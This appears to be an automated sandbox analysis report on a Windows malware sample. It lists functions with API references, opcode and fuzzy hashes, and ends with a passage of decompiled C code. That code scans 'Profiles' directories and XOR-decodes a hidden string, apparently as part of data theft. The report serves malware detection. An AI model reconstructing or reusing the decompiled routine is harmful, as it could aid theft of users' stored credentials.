Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 628b206d1c52e6f67c041649c9244a1154c95264b9b742b96990c2fb7e9bbb4c
Instruction ID: bed49f972d79d1702069562a51f9ab09383f616f9c572a3de19f1bd5630ab3cd
Opcode Fuzzy Hash: 628b206d1c52e6f67c041649c9244a1154c95264b9b742b96990c2fb7e9bbb4c
Instruction Fuzzy Hash: EFF04C36214304BFCB245FB4EC81AB6BB94FF80358F14442CF9054B590C6735C52DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00218577, Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00212551: EnterCriticalSection.KERNEL32(-0024BAE0,?,00213DF7,00000000,00244E90,0000000C,00213DBE,00000000,?,00218540,00000000,?,0021736D,00000001,00000364,00000007), ref: 00212560

EnumSystemLocalesW.KERNEL32(0021856A,00000001,00245070,0000000C,00218A49,00000000), ref: 002185AF

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: ffc045240e7b66acdf83d316db31b3593a45858e56ea417b5858c6da847dddfd
Instruction ID: cd04ba6796957c9f26f3390ea642f6deb47d3497b4c03f3c0df3e8f7ec0558d1
Opcode Fuzzy Hash: ffc045240e7b66acdf83d316db31b3593a45858e56ea417b5858c6da847dddfd
Instruction Fuzzy Hash: 81F03C76A51304EFE714EFA8E886B9C77F0EB05720F20412AF4149B291CB755955CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00222633, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

EnumSystemLocalesW.KERNEL32(0022258C,00000001,?,?,?,00222DF4,?,?,?,?), ref: 0022266A

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c1db0f864788737099e317793b10046cf4c4f26c129125fc0ae26e173bfa6fe1
Instruction ID: b22bdf1ad9ced1bb7cac66e25b6a39a4fd3f4d3d2764d50a5596aded7b066703
Opcode Fuzzy Hash: c1db0f864788737099e317793b10046cf4c4f26c129125fc0ae26e173bfa6fe1
Instruction Fuzzy Hash: 88F0553A300206B7CB289FB5EC557BA7FA4FFC1710B064058EA098B290C2729893DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00218BA4, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,?,?,?,?,00216179,?,20001004,00000000,00000002), ref: 00218BD8

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 564da5477cbd226cad0770fabf8c9d466a32bb2a76bd449e55ddaf89069929df
Instruction ID: 97e91875357cae5fa2a8a15e0a931abab863a674003614c9d7df43794c32fed8
Opcode Fuzzy Hash: 564da5477cbd226cad0770fabf8c9d466a32bb2a76bd449e55ddaf89069929df
Instruction Fuzzy Hash: 77E01A3151021CBBCB122F60EC48EDE3A5AFB54761F044420FD0965160CB728971AE95

Uniqueness

Uniqueness Score: -1.00%

Function 0020D72F, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 0020D8C7

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: db5a36484ad24e322e5e28d6fcb0b012ea527043ba6f81b7bc7456d59508248a
Instruction ID: 528acda30fd65cc5231a30604a9efebba35954adcf697461e8d0b2327c6fae70
Opcode Fuzzy Hash: db5a36484ad24e322e5e28d6fcb0b012ea527043ba6f81b7bc7456d59508248a
Instruction Fuzzy Hash: BF61793067230B56DF389EE8888577EF3A5AF45700F54492AE882DB2E3D7619D72CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0020D298, Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0020D414

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: c650d307a2851b8ea0a8b70aaa7a49f714905361973c972d15f4f034e59543e4
Instruction ID: b903c2e65170ffa973c78505ba079c3aac2135ab79d0dc03445048084b7fe15c
Opcode Fuzzy Hash: c650d307a2851b8ea0a8b70aaa7a49f714905361973c972d15f4f034e59543e4
Instruction Fuzzy Hash: CD519A3023270A9ADF388FFC84957BE67999B01304F144899E846C72C3C6A1ED75CA17

Uniqueness

Uniqueness Score: -1.00%

Function 001DD704, Relevance: .8, Instructions: 787COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65028e3c59fb2f979aeb66eb1b082c971528213d8642424f74cc52158650bcc
Instruction ID: ca6ac46508c9ea2e23b8bd1954a0cfb6828ec6d76b16acf1b3083cc414a4f6b2
Opcode Fuzzy Hash: a65028e3c59fb2f979aeb66eb1b082c971528213d8642424f74cc52158650bcc
Instruction Fuzzy Hash: BF62F6B1A00219DFCF08CF68D991AADBBF1FB58310F24816AD815EB385D734AA51DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0021DF29, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b5f7d8d6b95550b6ac1bfc8950227d8f6a62976bb2920f1ee5ea9fee986e656
Instruction ID: 961aa3dbc8d384efddb756595282e422c78b4d0cb9e3b48a8b5287e028ed5dbf
Opcode Fuzzy Hash: 8b5f7d8d6b95550b6ac1bfc8950227d8f6a62976bb2920f1ee5ea9fee986e656
Instruction Fuzzy Hash: E7321031D38F414DDB279A38DD26335A28DAFB63D4F16C727E82AB59A5EB28C4C74100

Uniqueness

Uniqueness Score: -1.00%

Function 001DE014, Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction ID: c6a091f8328fcd8f4fb7d39a5ee703aa63d921e472cf1b0996390abb644372bd
Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
Instruction Fuzzy Hash: E0E1F471E002299FCF14DFA8D9906ADBBF5FB98314F25816AE855EB344D730AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00221E42, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 6dac6cb48bc13abf2f36c997263fd9eaa83dd997bfb33b654ecce8bc897db25f
Instruction ID: 8093d1e1f8d04dd9a2f7bcc0198cf1fd8946be398020fbc68345148cb5e21b74
Opcode Fuzzy Hash: 6dac6cb48bc13abf2f36c997263fd9eaa83dd997bfb33b654ecce8bc897db25f
Instruction Fuzzy Hash: 11B12A35520316BBDB34DFA4DC82AB7B3E8EF14308F14452DEA42C6591EB76A9A5CB00

Uniqueness

Uniqueness Score: -1.00%

Function 001DEBE9, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d295633e9eeb20583dbdc655f678dfe308dc7cacda3f58af6d11c0ee3a6472
Instruction ID: 9c5531de23a67eca8eb1351e3b00f75cdc102ae05c502fee27f6e0a114dad538
Opcode Fuzzy Hash: 72d295633e9eeb20583dbdc655f678dfe308dc7cacda3f58af6d11c0ee3a6472
Instruction Fuzzy Hash: 1AB1D1B1604B00CFD374DF19C484A22BBF4EB49716B258A6ED4EACB791D731E846CB50

Uniqueness

Uniqueness Score: -1.00%

Function 002084BA, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction ID: 99654d65b3897eede0f0e365bd6ec382e915e0e39286421443c51b54da86e6ad
Opcode Fuzzy Hash: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
Instruction Fuzzy Hash: 7B516371E10219EFDF04CF99C941AAFBBB6FF88300F598059E455AB242C7359E61DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0021A5DD, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd32b4197f2101763404429a94541bb244fed68e82ccb4cd041cfaff5e6f4f7
Instruction ID: c8712a64a00dd2b349408a2cf79dfde9445f885c7f2eb429912cd3ad893ffee9
Opcode Fuzzy Hash: 0bd32b4197f2101763404429a94541bb244fed68e82ccb4cd041cfaff5e6f4f7
Instruction Fuzzy Hash: 0821B673F20439477B0CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 0021A4BD, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5abbcaff48d781602008cd70ab555683e2eacb638b42e00b873d2b294f810a6
Instruction ID: 701d952f0ed954b6937f1e642ff8425b4fabbad349c0ff2a8f562686d0c436e5
Opcode Fuzzy Hash: d5abbcaff48d781602008cd70ab555683e2eacb638b42e00b873d2b294f810a6
Instruction Fuzzy Hash: 7D117723F30C256B675C816D8C172BA95D6DBD825074F533AD826E7284E994DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 001DE857, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f8d69497066a64543ec8cd6cdfdc9d7b9d4ac26df374036caca4aee0df860a
Instruction ID: b41bc9c3495b5f1e83798cb0d2f1838b64ea6158efc91ca45c8de355c28ab277
Opcode Fuzzy Hash: 06f8d69497066a64543ec8cd6cdfdc9d7b9d4ac26df374036caca4aee0df860a
Instruction Fuzzy Hash: 122154305251B10AC64C673AAC25436BBD1DB4731338B42FFE9C7E90C2C52AD521D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 001FD757, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5cc8c306e5652939df4f012592062290baf7431d0076294f936e5992df6839
Instruction ID: 3c50dcc568f88eb2aad3856bc717aad60c3818dfc8f738e037868f1b1e30edd1
Opcode Fuzzy Hash: ed5cc8c306e5652939df4f012592062290baf7431d0076294f936e5992df6839
Instruction Fuzzy Hash: B22154705241F50ACB0D4B3ABC35436FB919B472573CB42ABEF87EA0C6CA29D524D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0021A0B2, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d553ca2f0cfa07f1777449ead2f6cf2a373648ea15f7f48f21b212dbb0bc91e
Instruction ID: fda0e030a65fc9e4bc27ac277a184fe5d68d8a52cca605f870310493703c925b
Opcode Fuzzy Hash: 5d553ca2f0cfa07f1777449ead2f6cf2a373648ea15f7f48f21b212dbb0bc91e
Instruction Fuzzy Hash: E1F0F632672121EBC726CE5C8A09BD973D8E719750F204052E501E7250C6B0DED087C1

Uniqueness

Uniqueness Score: -1.00%

Function 0021A03D, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0376e1a5b570027270e780742d46e106aefe91f0946bf6e103f7805ab914718
Instruction ID: 37fcb9eb5809acd15f049df4ff0f31b99724bbbb01099c7300e272cf8dc29f01
Opcode Fuzzy Hash: b0376e1a5b570027270e780742d46e106aefe91f0946bf6e103f7805ab914718
Instruction Fuzzy Hash: 25F06D31A22224EBCB26DF8CD845B8973ECEB59B50F214096F541EB250C6B0DE90CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0021A081, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction ID: c5df1c2a74bc4b9aefe1787da0e925b47e20e572062bc5c91d147ffdca26af8d
Opcode Fuzzy Hash: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
Instruction Fuzzy Hash: 84E08C32922228EBCB24DB88C944A8AF3ECEB88B00F114096B502D3150C670DE90CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 001E2683, Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 432
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E001E2683(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t212;
				signed int _t219;
				intOrPtr _t225;
				void* _t235;
				void* _t239;
				void* _t240;
				void* _t256;
				void* _t263;
				void* _t265;
				intOrPtr _t267;
				void* _t272;
				intOrPtr* _t280;
				signed int _t281;
				void* _t287;
				void* _t303;
				char _t308;
				void* _t316;
				char _t338;
				char _t352;
				void* _t353;
				char _t355;
				signed char _t358;
				signed char _t361;
				char _t376;
				void* _t378;
				signed char _t385;
				char _t388;
				char _t391;
				void* _t397;
				intOrPtr _t398;
				void* _t401;
				void* _t402;
				void* _t410;
				void* _t411;
				void* _t412;
				void* _t413;
				void* _t414;
				void* _t416;
				intOrPtr _t417;
				void* _t418;
				void* _t420;

				_t420 = __eflags;
				L00227790(0x229678, _t414);
				_t417 = _t416 - 0x44c;
				 *((intOrPtr*)(_t414 - 0x10)) = _t417;
				_t403 = __ecx;
				 *(_t414 - 0x1c) = 0;
				 *0x22d2d4(0, 0x1a, 0, 0, _t414 - 0x354, _t397, _t402, _t287);
				E001DC8EE(_t414 - 0x458, 0x104, L001F57CC(L001F57CC("%s", __ecx), "Profiles"), _t414 - 0x354);
				 *((char*)(_t414 - 0x40)) = 0;
				_push( *((intOrPtr*)(_t414 - 0x40)));
				E001D4BDC(_t414 - 0x458);
				_t418 = _t417 + 0x14;
				 *((intOrPtr*)(_t414 - 4)) = 0;
				_push(_t414 - 0xf0);
				E001CAC66(0, _t414 - 0x80, _t397, _t403, _t420);
				E001D2D4F(_t414 - 0xf0);
				E001CBF31(_t414 - 0x4c, _t414 - 0x80);
				_t398 =  *((intOrPtr*)(_t414 - 0x4c));
				_t404 =  *(_t414 - 0x48);
				 *((intOrPtr*)(_t414 - 0x6c)) = _t398;
				 *(_t414 - 0x68) = _t404;
				E001CBF31(_t414 - 0xf8, _t414 - 0x80);
				_t299 =  *((intOrPtr*)(_t414 - 0xf4));
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x4c], xmm0");
				_t212 = 0;
				 *((intOrPtr*)(_t414 - 0x4c)) = 0;
				 *(_t414 - 0x48) = 0;
				if( *((intOrPtr*)(_t414 - 0xf4)) != 0) {
					E001C9597(_t299);
					_t212 = 0;
				}
				 *((char*)(_t414 - 4)) = 4;
				while(_t398 != _t212) {
					_t400 = _t398 + 0x20;
					 *((char*)(_t414 - 4)) = 5;
					_t303 = _t398 + 0x20;
					if(E001CB2CE(_t303) != 0) {
						E001D3654(_t400, _t414 - 0x98);
						 *(_t414 - 0x1c) =  *(_t414 - 0x1c) | 0x00000004;
						 *((char*)(_t414 - 4)) = 6;
						_t218 =  >=  ?  *((void*)(_t414 - 0x98)) : _t414 - 0x98;
						_t219 =  *((intOrPtr*)( *0x24c1d8))( >=  ?  *((void*)(_t414 - 0x98)) : _t414 - 0x98, _t303);
						 *((char*)(_t414 - 4)) = 5;
						_t404 = _t219;
						E001D2F2D(_t414 - 0x98);
						if(_t219 == 0) {
							asm("movaps xmm0, [0x23d810]");
							_t308 = 0;
							asm("movups [ebp-0xd8], xmm0");
							do {
								 *(_t414 + _t308 - 0xd7) =  *(_t414 + _t308 - 0xd7) ^  *(_t414 - 0xd8);
								_t308 = _t308 + 1;
							} while (_t308 < 0xe);
							_push(_t308);
							 *((char*)(_t414 - 0xc9)) = 0;
							E001D3654(_t400, _t414 - 0x110);
							_t404 =  *(_t414 - 0x1c) | 0x00000020;
							 *(_t414 - 0x1c) = _t404;
							 *((char*)(_t414 - 4)) = 7;
							_t311 =  >=  ?  *((void*)(_t414 - 0x110)) : _t414 - 0x110;
							_t225 = L001F57CC( >=  ?  *((void*)(_t414 - 0x110)) : _t414 - 0x110, _t414 - 0xd7);
							 *((char*)(_t414 - 0x70)) = 0;
							_push( *((intOrPtr*)(_t414 - 0x70)));
							 *((intOrPtr*)(_t414 - 0x44)) = _t225;
							E001D4BA2(_t414 - 0x44);
							 *((char*)(_t414 - 4)) = 8;
							 *((char*)(_t414 - 0x11)) = E001CB272(0, _t414 - 0x1a0, _t400, _t404);
							E001D2D4F(_t414 - 0x1a0);
							_t316 = _t414 - 0x110;
